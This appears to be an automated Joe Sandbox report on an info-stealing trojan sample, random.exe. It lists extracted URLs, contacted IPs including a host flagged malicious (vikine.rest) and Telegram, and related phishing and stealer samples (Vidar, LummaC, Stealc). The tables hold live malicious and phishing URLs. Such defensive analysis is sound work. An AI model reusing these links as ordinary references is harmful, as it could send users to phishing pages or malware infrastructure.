http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000014.00000003.1975148309.000062540340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974550041.0000625403364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1972586703.0000625403284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1973229838.0000625403130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1973087194.0000625403294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1973210052.00006254032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974091902.0000625403158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1973281183.00006254032B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974430350.00006254025B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974003710.0000625402BAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2054191462.00006254024F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974032381.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 00000014.00000002.2055150861.0000625402674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1987654415.0000625403624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1988611758.0000625403658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1987571221.000062540361C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1987437868.0000625403580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1987731731.000062540362C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1988376152.0000625403580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1988324152.00006254034E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000014.00000003.1960345491.000016880071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1999012502.0000168800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1996954283.000062540380C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1960473803.0000168800728000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.go	chrome.exe, 00000014.00000002.2054318251.0000625402510000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5901	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/MergeSession	msedge.exe, 00000018.00000003.2092778734.00007DEC00268000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2061150428.0000625402E0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2062430977.0000625402FF4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload	chrome.exe, 00000014.00000003.1960935235.0000168800878000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3832	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000014.00000003.1980945285.00006254024A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-0.corp.google.com/	chrome.exe, 00000014.00000003.1963950149.00006254026B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json.26.dr	false		high
https://permanently-removed.invalid/Logout	msedge.exe, 00000018.00000003.2092707753.00007DEC00264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2093085464.00007DEC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2092778734.00007DEC00268000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/upload	chrome.exe, 00000014.00000003.1975148309.000062540340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974550041.0000625403364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1974430350.00006254025B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 00000014.00000002.2063345327.00006254031C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2059729634.0000625402C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2061075589.0000625402DE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2057087087.00006254028C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2062584021.0000625403014000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6651	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2061150428.0000625402E0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/4830	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/:	chrome.exe, 00000014.00000002.2057087087.00006254028C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/	chrome.exe, 00000014.00000002.2065006385.0000625403DA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/shielded-email2B	chrome.exe, 00000014.00000003.1996954283.000062540380C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://vikine.resttL	Rna.com, 0000000D.00000002.2664591239.000000000117A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000014.00000002.2055411605.00006254026D0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2162	chrome.exe, 00000014.00000003.1967741173.0000625402FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.1967709629.0000625402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.2061150428.0000625402E0C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5430	chrome.exe, 00000014.00000002.2060951547.0000625402D7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_M1_AllAPIs_GA4Kids_Stable_20230830htt	chrome.exe, 00000014.00000002.2047313197.0000168800920000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.23.209.34	e28578.d.akamaiedge.net	European Union	1273	CWVodafoneGroupPLCEU	false
216.58.212.142	plus.l.google.com	United States	15169	GOOGLEUS	false
23.200.88.34	unknown	United States	16625	AKAMAI-ASUS	false
5.75.214.119	vikine.rest	Germany	24940	HETZNER-ASDE	true
2.22.242.11	a416.dscd.akamai.net	European Union	20940	AKAMAI-ASN1EU	false
23.219.82.75	unknown	United States	20940	AKAMAI-ASN1EU	false
104.126.116.11	unknown	United States	20940	AKAMAI-ASN1EU	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
13.74.129.1	c-msn-pme.trafficmanager.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.244.18.32	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
142.250.185.238	play.google.com	United States	15169	GOOGLEUS	false
172.217.18.1	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
18.164.116.122	unknown	United States	3	MIT-GATEWAYSUS	false
172.217.16.132	www.google.com	United States	15169	GOOGLEUS	false
204.79.197.203	a-0003.a-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.89.179.9	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.8
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1609435
Start date and time:	2025-02-07 17:41:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@86/306@29/23
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.22.50.136, 2.23.77.188, 142.250.185.131, 142.250.186.78, 108.177.15.84, 142.250.184.238, 216.58.206.67, 142.250.186.46, 142.250.186.138, 142.250.186.74, 142.250.185.74, 142.250.186.42, 142.250.184.202, 172.217.16.202, 142.250.185.234, 142.250.185.202, 142.250.186.170, 142.250.181.234, 142.250.184.234, 216.58.206.42, 142.250.186.106, 142.250.185.170, 142.250.185.106, 142.250.185.138, 142.250.185.110, 13.107.42.16, 142.250.185.142, 13.107.6.158, 13.107.21.239, 204.79.197.239, 48.209.144.71, 88.221.110.179, 88.221.110.195, 2.21.65.132, 2.21.65.154, 2.19.126.151, 2.19.126.157, 20.93.72.182, 2.22.242.82, 2.22.242.121, 142.251.40.163, 142.251.35.163, 20.12.23.50, 184.28.90.27, 23.206.229.226, 94.245.104.56, 40.126.31.129, 13.107.246.38, 150.171.27.10, 104.117.182.59, 20.25.227.174, 104.117.182.153
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, redirector.gvt1.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, th.bing.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, th.bing.com.edgekey.net, api.edgeoffer.microsoft.com, star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net, ctldl.windowsupdate.com, ogads-pa.googleapis.com, p-th.bing.com.trafficmanager.net, b-0005.b-msedge.net, prod-atm-wds-edge.trafficmanager.net, prod-agic-ne-2.northeurope.clou
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:42:57	API Interceptor	1x Sleep call for process: random.exe modified
11:43:01	API Interceptor	10x Sleep call for process: Rna.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
2.23.209.34	https://kdnsedbclf.rocmodulaar.com/redirect/.red/.off/DEICIWEDGK/GKZFVHJQRB/WYMJACWTFQ	Get hash	malicious	HTMLPhisher	Browse
	https://vqr.vc/YdvOeCQGb	Get hash	malicious	HTMLPhisher	Browse
	https://stonewoodinvestmentssmartviewaccess.uscourtfiles.com/QGL2K	Get hash	malicious	HTMLPhisher	Browse
	https://tdn.docshostingservice.com/WeQiU	Get hash	malicious	HTMLPhisher	Browse
	http://hr.cuassistance.org/login/login.php	Get hash	malicious	Unknown	Browse
	https://ipfs.io/ipfs/Qmairr5VbGqYuZovUcw9rWWTMy6uCYZJtKdyb1PHBpaMzr	Get hash	malicious	HTMLPhisher	Browse
	https://supportsystem-customerservice.github.io/newhot/lit%20(2).html	Get hash	malicious	HTMLPhisher	Browse
	(No subject).eml	Get hash	malicious	Unknown	Browse
	https://eminentpr.com/?nnt=dG9ueWEuZ3JlZW5sZXlAc3BvbmdlLWN1c2hpb24uY29tLS0tLUNoYWQgU2ltbW9ucw==	Get hash	malicious	HTMLPhisher	Browse
	https://www.iopp.org/i4a/utilities/banner-log.cfm?ID=74&webURL=%68%74%74%70%73%3A%2F%2F%76%69%65%77%2E%6D%69%63%72%6F%73%6F%66%74%6F%6E%6C%69%6E%65%2E%63%6F%6D%6F%75%75%74%68%68%63%6C%69%65%65%6E%74%2E%74%6F%70%2F%6F%72%67%61%6E%69%7A%61%74%69%6F%6E%73%2F%6F%61%75%74%68%32%2F%76%32%2E%30%2F%61%75%74%68%6F%72%69%7A%65%2F%63%6C%69%65%6E%74%69%64%34%37%36%35%39%34%30%62%33%32%63%36%34%39%39%34%39%35%39%35%36%33%38%34%35%34%35%32%33%34%36%31%33%35%36%31%36%38%33%36%31%30%30%34%32%4F%47%54%4C%50%51%58%59	Get hash	malicious	HTMLPhisher	Browse
23.200.88.34	https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/ERWUgunUKWdDoEpnpewg4S0BeV_zc9P4BqPEDSGk7NgP5Q?e=vHfJIQ	Get hash	malicious	Unknown	Browse
5.75.214.119	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse
2.22.242.11	NF_e.msi	Get hash	malicious	AteraAgent	Browse
	7OmeyJ9pug.lnk	Get hash	malicious	Unknown	Browse
	Document-0191536.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse
	82.msi	Get hash	malicious	Unknown	Browse
	unins000.exe	Get hash	malicious	Vidar	Browse
	uwmC39FNho.exe	Get hash	malicious	Remcos	Browse
23.219.82.75	vm8F3uhSzG.exe	Get hash	malicious	Vidar	Browse
	CLOlOswCpi.msi	Get hash	malicious	Unknown	Browse
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
104.126.116.11	Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnk	Get hash	malicious	RHADAMANTHYS	Browse
104.126.116.11	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	http://vtqkzgxpcym.wiki/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://tmbzpwoqknhjy.wang/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://skbtzgxlwajhp.link/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://memuralfi.ink/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://prfwzxyqvbhlg.work/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	hfzMMKRr0e.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	149.154.167.99
	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	8sjNRdoJng.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	149.154.167.99
	c3QebhWPbe.exe	Get hash	malicious	Amadey, GCleaner, Healer AV Disabler, KeyLogger, LummaC Stealer, Stealc, StormKitty	Browse	149.154.167.99
chrome.cloudflare-dns.com	GUI.for.SingBox.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecuriteInfo.com.Win64.Evo-gen.13578.12741.exe	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	hfzMMKRr0e.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.64.41.3
	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	ijTwgZFLCu.lnk	Get hash	malicious	Unknown	Browse	162.159.61.3
	8sjNRdoJng.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	172.64.41.3
	HFONAfX2aC.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	5o5R0tox6x.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Jjswaste Pr0ject.svg	Get hash	malicious	Unknown	Browse	172.64.41.3
a416.dscd.akamai.net	hfzMMKRr0e.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	2.19.126.152
	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse	2.19.126.145
	ijTwgZFLCu.lnk	Get hash	malicious	Unknown	Browse	2.19.126.145
	8sjNRdoJng.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	2.19.126.152
	HFONAfX2aC.lnk	Get hash	malicious	Unknown	Browse	2.19.126.152
	5o5R0tox6x.exe	Get hash	malicious	Vidar	Browse	2.19.126.145
	Jjswaste Pr0ject.svg	Get hash	malicious	Unknown	Browse	2.19.11.100
	cjrimgid.exe	Get hash	malicious	Vidar	Browse	2.22.242.105
	7OmeyJ9pug.lnk	Get hash	malicious	Unknown	Browse	2.22.242.11
	dOuC8iH5As.exe	Get hash	malicious	Vidar	Browse	2.19.126.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	3MnerqRZQh.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	99UbUXnwA9.exe	Get hash	malicious	FormBook	Browse	144.76.229.203
	mnojiyyWfG.exe	Get hash	malicious	FormBook	Browse	144.76.229.203
	xBA5hw2TjG.exe	Get hash	malicious	FormBook	Browse	5.161.107.251
	jVxEM7I2hF.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	MkLWmSIwGK.exe	Get hash	malicious	FormBook	Browse	148.251.114.233
	tWEAT1G71C.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	CmkB1sJyK9.exe	Get hash	malicious	FormBook	Browse	136.243.225.5
	CSLWDfAbtG.exe	Get hash	malicious	FormBook	Browse	5.161.107.251
CWVodafoneGroupPLCEU	zHH1eSjWTK.exe	Get hash	malicious	Unknown	Browse	2.23.197.184
	ZumHVoVnxD.exe	Get hash	malicious	GhostRat	Browse	2.23.197.184
	https://kdnsedbclf.rocmodulaar.com/redirect/.red/.off/DEICIWEDGK/GKZFVHJQRB/WYMJACWTFQ	Get hash	malicious	HTMLPhisher	Browse	2.23.209.17
	https://mailtrack.io/l/f417f9a1ba0740bbe0f8b9fcdcdd50bf6dcca2af	Get hash	malicious	HTMLPhisher	Browse	2.23.209.38
	06FEB2025.IMAGE.pdf	Get hash	malicious	HTMLPhisher	Browse	2.23.197.184
	phish_alert_iocp_v1.4.48 (39).eml	Get hash	malicious	HTMLPhisher	Browse	2.23.197.184
	Employee@RLee-036.pdf	Get hash	malicious	Unknown	Browse	2.23.197.184
	https://vqr.vc/YdvOeCQGb	Get hash	malicious	HTMLPhisher	Browse	2.23.209.34
	https://myaccount.microsoft.com/groups/action?tid=975c0940-6ee1-4da8-8016-f00c9fc8476f&groupId=84faba4d-72f7-4308-957c-501dcbdb1f58&action=Renew	Get hash	malicious	Unknown	Browse	2.23.209.25
	https://stonewoodinvestmentssmartviewaccess.uscourtfiles.com/QGL2K	Get hash	malicious	HTMLPhisher	Browse	2.23.209.17
AKAMAI-ASN1EU	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	Get hash	malicious	ScreenConnect Tool	Browse	2.22.242.226
	http://%5B%22https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Femail.bcbssettlement.com%2Fc%2FeJxkzL1OwzAQAOCnscfIPv9m8IAgERVqQRTm6OxcVaPERcnB87Owdf_0zclG8M5JSjqY2Gvd91FekzYqO3LxgkXb4rxykA1hCME4F0KRNYECp0AFFZQ3sQNvvLUzImU7a62FVbnkfSfmhVZq3JXbKpd0Zf7ehXkQMAoYdyo_G3X3UsA4E9O21oZcb01u6YuwUaOON7zUgo1JWIVLrv83p_Pzy_T2PhwPn8fp9PpxeBym83B6kr8J_gIAAP__kjFIFA&data=05%7C02%7Cjeanene.traficante%40albint.com%7C1fdf299aa52a4a651cc208dd4745f85b%7Cff3d33ae31364152812675e51f4a1404%7C0%7C0%7C638745088046675413%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=fGCIRyUUbeFPm7FcRl%2FZ7oH%2FXi3jt5H1pOFROm4%2BJoY%3D&reserved=0%22,%20%222f9fb485af706049f5d23654ae36fb8f%22%5D	Get hash	malicious	Unknown	Browse	95.101.149.35
	https://saber-mercurial-tang.glitch.me/ONENOTE.html	Get hash	malicious	HTMLPhisher	Browse	95.101.149.160
	https://www.flugger.pl/	Get hash	malicious	Unknown	Browse	2.22.50.205
	Ohio.mp4	Get hash	malicious	Unknown	Browse	95.101.148.7
	Ohio.mp4	Get hash	malicious	Unknown	Browse	95.101.148.7
	http://upholldlogin.godaddysites.com/	Get hash	malicious	Unknown	Browse	2.19.96.250
	https://stemcommunuity.com/87b9a9ed76bcb7367b5aa0f03eceebbd/c3RlbWNvbW1tdW51dGx5LmNvbQ==/aHR0cDovL3N0ZW1jb21tdW51aXR5LmNvbS9nbGZ0Lzc2MTI2MzEyMzUxMjM0	Get hash	malicious	Unknown	Browse	95.101.149.47
	http://stemcommunuity.com/glft/76126312351234	Get hash	malicious	Unknown	Browse	95.101.149.47
AKAMAI-ASUS	random.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	Get hash	malicious	ScreenConnect Tool	Browse	2.19.126.136
	DH1g7hYSFR.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	http://%5B%22https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Femail.bcbssettlement.com%2Fc%2FeJxkzL1OwzAQAOCnscfIPv9m8IAgERVqQRTm6OxcVaPERcnB87Owdf_0zclG8M5JSjqY2Gvd91FekzYqO3LxgkXb4rxykA1hCME4F0KRNYECp0AFFZQ3sQNvvLUzImU7a62FVbnkfSfmhVZq3JXbKpd0Zf7ehXkQMAoYdyo_G3X3UsA4E9O21oZcb01u6YuwUaOON7zUgo1JWIVLrv83p_Pzy_T2PhwPn8fp9PpxeBym83B6kr8J_gIAAP__kjFIFA&data=05%7C02%7Cjeanene.traficante%40albint.com%7C1fdf299aa52a4a651cc208dd4745f85b%7Cff3d33ae31364152812675e51f4a1404%7C0%7C0%7C638745088046675413%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=fGCIRyUUbeFPm7FcRl%2FZ7oH%2FXi3jt5H1pOFROm4%2BJoY%3D&reserved=0%22,%20%222f9fb485af706049f5d23654ae36fb8f%22%5D	Get hash	malicious	Unknown	Browse	104.102.34.86
	Policies_Handbook_2025_Revised.pdf	Get hash	malicious	Unknown	Browse	184.28.88.176
	https://barclays-the-chinese-spirits-industry-expert-feb-2025.open-exchange.net/	Get hash	malicious	Unknown	Browse	2.16.202.120
	https://saber-mercurial-tang.glitch.me/ONENOTE.html	Get hash	malicious	HTMLPhisher	Browse	184.28.89.233
	20250207_053226_E6u1qLnksPUaNqBWpzwaWHyyc9Li2HA3.eml	Get hash	malicious	Unknown	Browse	2.19.126.151
	https://exsrtra-cancellesd.com/	Get hash	malicious	HTMLPhisher	Browse	104.102.43.106
	http://upholldlogin.godaddysites.com/	Get hash	malicious	Unknown	Browse	23.38.98.115

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	KI2TC403469M29HH3Z3QDLRSHS.dll.dll	Get hash	malicious	Latrodectus	Browse	5.75.214.119 149.154.167.99
	0Jh86ErLzV.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	5.75.214.119 149.154.167.99
	SBnIqnD6ap.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	5.75.214.119 149.154.167.99
	62ymqatXRt.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	5.75.214.119 149.154.167.99
	CdL8Vi5z8O.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	5.75.214.119 149.154.167.99
	kJpqSA2IOT.exe	Get hash	malicious	FormBook, GuLoader	Browse	5.75.214.119 149.154.167.99
	kjjA3Ebw2c.exe	Get hash	malicious	Unknown	Browse	5.75.214.119 149.154.167.99
	KWbWCYe6LB.exe	Get hash	malicious	GuLoader	Browse	5.75.214.119 149.154.167.99
	kjjA3Ebw2c.exe	Get hash	malicious	Unknown	Browse	5.75.214.119 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\g4opz\mycj5f	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse
	dOuC8iH5As.exe	Get hash	malicious	Vidar	Browse
	SQ1NgqeTQy.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, KeyLogger, LummaC Stealer, Stealc, StormKitty	Browse
	1l1ohfybAf.exe	Get hash	malicious	Vidar	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	2E02vIiMfd.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	25xTHcaF7V.exe	Get hash	malicious	Vidar	Browse
	test.hta	Get hash	malicious	Vidar	Browse
	din.exe	Get hash	malicious	Vidar	Browse

Process:	C:\Users\user\AppData\Local\Temp\190244\Rna.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1468
Entropy (8bit):	5.0065780470180306
Encrypted:	false
